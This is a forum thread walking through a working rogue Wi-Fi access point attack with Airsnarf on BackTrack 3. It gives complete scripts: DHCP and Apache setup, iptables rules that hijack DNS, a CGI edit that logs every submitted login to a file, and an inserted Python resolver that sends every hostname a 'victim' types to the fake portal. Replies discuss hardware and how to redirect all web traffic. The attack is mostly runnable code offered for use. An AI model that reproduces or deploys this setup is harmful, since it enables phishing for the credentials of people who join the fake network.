This guide has been put together from a number of different guides, tested on BT3, and works great. I am using a proxim8470-WD card.
1st, boot into BackTrack 3.
Make a dir in /var/www called html.
Make a dir in /var/state called dhcp.
Download dhcp-3.0.5-i486-2.tgz.
tar -zxvf dhcp-3.0.5-i486-2.tgz -C /   (it is a Slackware package, so extract it into / or use installpkg)
touch /var/state/dhcp/dhcpd.leases
Next open kwrite and make a file called /etc/rc.d/rc.dhcpd.
Open the file, put this in there and save it:
#!/bin/sh
#
# /etc/rc.d/rc.dhcpd
#
# Start/stop/restart the ISC DHCP server (dhcpd).
#
# To make dhcpd start automatically at boot, make this
# file executable: chmod 755 /etc/rc.d/rc.dhcpd
#
dhcpd_start() {
  # only start if the binary is there and the config is readable
  if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
    echo "Starting dhcpd..."
    /usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
  fi
}

dhcpd_stop() {
  killall dhcpd
}

dhcpd_restart() {
  dhcpd_stop
  sleep 2
  dhcpd_start
}

case "$1" in
  'start')
    dhcpd_start
    ;;
  'stop')
    dhcpd_stop
    ;;
  'restart')
    dhcpd_restart
    ;;
  *)
    # Default is "start", for backwards compatibility with previous
    # Slackware versions. This may change to a 'usage' error someday.
    dhcpd_start
    ;;
esac
Then create another file, /etc/rc.d/rc.httpd.
Open the file, put this in there, then save it:
#!/bin/sh
#
# /etc/rc.d/rc.httpd
#
# Start/stop/restart the Apache web server.
#
# To make Apache start automatically at boot, make this
# file executable: chmod 755 /etc/rc.d/rc.httpd
#
conffile=/etc/httpd/httpd.conf

start() {
  # use startssl only if mod_ssl is actually included in the config
  if grep -q "^Include /etc/apache/mod_ssl.conf" "$conffile" ; then
    /usr/sbin/apachectl startssl
  else
    /usr/sbin/apachectl start
  fi
}

stop() {
  /usr/sbin/apachectl stop
}

restart() {
  /usr/sbin/apachectl restart
}

# See how we were called.
case "$1" in
  start)
    start
    ;;
  stop)
    stop
    ;;
  restart)
    restart
    ;;
  *)
    echo "usage $0 start|stop|restart"
    ;;
esac
chmod 755 /etc/rc.d/rc.httpd
chmod 755 /etc/rc.d/rc.dhcpd
Go to the airsnarf directory /pentest/wireless/airsnarf, open airsnarf and replace its contents with this:
#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.
echo "Airsnarf - A rogue AP setup utility."
echo "0.2"
echo "The Shmoo Group"
echo "------------------------------------"

# here are some variables you may want to edit
WWW_ROOT="/var/www/html"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"

# specify another config dir with a command line arg if you want
if [ -n "$1" ]; then
    LOCAL_CFG="$1"
fi
# pulls in ROGUE_SSID, ROGUE_NET, ROGUE_GW and ROGUE_INTERFACE
source "$LOCAL_CFG/airsnarf.cfg"

# create the dhcpd.conf
echo -n "Creating dhcpd.conf..."
sed "s/AIRSNARF/$ROGUE_NET/g" ./etc/dhcpd.src > /etc/dhcpd.conf
echo "Done."

# copy over the www stuff
echo -n "Building the captive portal..."
cp "$LOCAL_CFG"/html/* "$WWW_ROOT"
cp "$LOCAL_CFG"/cgi-bin/* "$CGI_ROOT"
chmod +x "$CGI_ROOT"/*
echo "Done."

# set our wireless parameters (madwifi: recreate the VAP in AP mode)
echo -n "Setting the wireless parameters..."
ifconfig "$ROGUE_INTERFACE" down
wlanconfig "$ROGUE_INTERFACE" destroy
wlanconfig "$ROGUE_INTERFACE" create wlandev wifi0 wlanmode ap
ifconfig "$ROGUE_INTERFACE" up
iwconfig "$ROGUE_INTERFACE" essid "$ROGUE_SSID" mode master
echo "Done."

# set our ip and default route
echo -n "Setting the ip address and default route..."
ifconfig "$ROGUE_INTERFACE" "$ROGUE_GW"
route add -net 0.0.0.0 gw "$ROGUE_GW"
echo "Done."

# restart some services (bind dhcpd to the rogue interface only)
/usr/sbin/dhcpd -cf /etc/dhcpd.conf "$ROGUE_INTERFACE"
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart

# set up the firewall to redirect
echo -n "Setting up firewall to redirect DNS..."
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
    --to "$ROGUE_GW"
# dammit, I swear this used to work with just an OUTPUT rule...
iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
    --to "$ROGUE_GW"
echo "Done."

# start the local dns resolver
echo "Starting local DNS resolver..."
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl
Now open the cfg folder in the airsnarf directory and edit airsnarf.cfg.
Replace its contents with:
ROGUE_SSID="ap name"
ROGUE_NET="192.168.1."
ROGUE_GW="192.168.1.254"
ROGUE_INTERFACE="ath0"
#export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE
Now, for saving the captured logins to the file /tmp/airsnarf_pwds.txt:
open airsnarf-0.2/cfg/cgi-bin and edit airsnarf.cgi.
Comment out (or delete) everything from "$mailprog = '/usr/sbin/sendmail';" until "close(MAIL);"
and replace it with:
# append every submitted form field to the log file instead of mailing it
open (MYFILE, '>>/tmp/airsnarf_pwds.txt') or die "cannot open log: $!";
foreach $key (keys(%FORM)) {
    print MYFILE "$key = $FORM{$key}\n";
    print MYFILE "----------------------\n";
}
close(MYFILE);
Save the file.
Now run airsnarf and try to connect; you will get "It works" on screen, don't worry.
Go to /var/www/html and copy everything to /var/www/htdocs. Try to connect now from a Windows box etc., then check the passwords.
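The last step of the airsnarf script starts airsnarf_dns.pl, a resolver that answers every name with the gateway address, so whatever hostname the client types resolves to the captive portal. As an added example that is not part of dapirates' post or the Shmoo Group's airsnarf code, the Python below does the same job: it parses the question section of a raw DNS query, echoes it back with QR/AA set, and attaches one A record pointing at the gateway. The function names (parse_query, build_response, build_query, serve), the 60-second TTL and the sample query are my assumptions; the address 192.168.1.254 is the ROGUE_GW from the airsnarf.cfg above.

```python
"""Answer-everything DNS responder: every A query resolves to one IP.

Added example (not from the airsnarf project). ROGUE_GW matches the
thread's airsnarf.cfg; everything else here is assumed for illustration.
"""
import socket
import struct

ROGUE_GW = "192.168.1.254"   # from the thread's airsnarf.cfg
DEFAULT_TTL = 60             # assumed: short TTL so clients re-ask often


def parse_query(data: bytes):
    """Parse a raw DNS query with one question.

    Returns (txid, qname, qtype, qclass, question_bytes) or raises
    ValueError on anything that is not a plain single-question query.
    """
    if len(data) < 12:
        raise ValueError("too short for a DNS header")
    txid, flags, qdcount = struct.unpack("!HHH", data[:6])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels = []
    pos = 12
    while True:
        if pos >= len(data):
            raise ValueError("truncated question name")
        length = data[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer not allowed in question")
        labels.append(data[pos:pos + length].decode("ascii"))
        pos += length
    if pos + 4 > len(data):
        raise ValueError("truncated qtype/qclass")
    qtype, qclass = struct.unpack("!HH", data[pos:pos + 4])
    pos += 4
    return txid, ".".join(labels), qtype, qclass, data[12:pos]


def build_response(query: bytes, ip: str = ROGUE_GW, ttl: int = DEFAULT_TTL) -> bytes:
    """Build the reply: the original question plus one A record -> ip.

    Non-A queries (e.g. AAAA) get NOERROR with an empty answer section, a
    'no data' reply that makes clients fall back to the A record instead
    of waiting on a timeout.
    """
    txid, _qname, qtype, qclass, question = parse_query(query)
    rd = struct.unpack("!H", query[2:4])[0] & 0x0100      # copy RD bit
    flags = 0x8000 | 0x0400 | rd | 0x0080                  # QR, AA, RD, RA
    if qtype == 1 and qclass == 1:                         # A record, IN class
        ancount = 1
        # 0xC00C is a compression pointer back to the name at offset 12
        answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    else:
        ancount = 0
        answer = b""
    header = struct.pack("!HHHHHH", txid, flags, 1, ancount, 0, 0)
    return header + question + answer


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Constructed test input: a recursion-desired query for `name`."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def serve(bind_ip: str = ROGUE_GW, port: int = 53) -> None:
    """Listen on UDP/53 (needs root) and answer every query with ROGUE_GW."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(build_response(data), peer)
        except ValueError:
            continue   # malformed or non-query packet: ignore it


if __name__ == "__main__":
    serve()
```

Because the iptables DNAT rules in the airsnarf script already send every UDP/53 packet to ROGUE_GW, binding this on the gateway address is all that is needed; the resolver never forwards anything upstream, which is exactly why every site name the victim enters lands on the local Apache.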
Why copy all the files across???? Just modify:
Code:
# here are some variables you may want to edit
WWW_ROOT="/var/www/htdocs"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"
Cheers
Thanks for the info Dr_GrEeN, I have done that now. I should have noticed that lol
Good tut dapirates. I always loved a lil airsnarfin. Well airsnarfin at my house with my equipment.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
This topic is useful. I will test this after.
Thanks for the info- I'm going to have to give this a try when I get BT3 up and running on my laptop with a PCMCIA slot. Anyone had any luck using airsnarf with a RT75 USB chipset? I'd love to get it working on my new laptop that doesn't have a PCMCIA slot for my atheros chip.
bump.....................
I have made this video Airsnarfing on Backtrack 3 and also uploaded all files needed to rapidshare
http://dapirates1.blip.tv/#650915
I hope it comes in handy to some of you.
My life is a living Hell, Day by Day fixing broken Windows Boxes (will it ever end)
Bump da Bump? Anyone have any modifications for this that will work for the USB drivers? My new laptop doesn't support PCMCIA so I can't use my Atheros card any longer. I've been using the rausb0 device through VMWare. Anyone else in the same boat?
This is a fantastic guide, I followed it closely and it took a while but things eventually worked. I have one query though. How do you make all HTML requests go to the gateway address? I got everything working just like yours and when I connect to the rogue AP I'm not directed to anything, just get blank pages; the only page that works is the rogue AP address. Is there any way to redirect all HTML requests to the local server? This might be an Apache thing, I've never been great with Apache.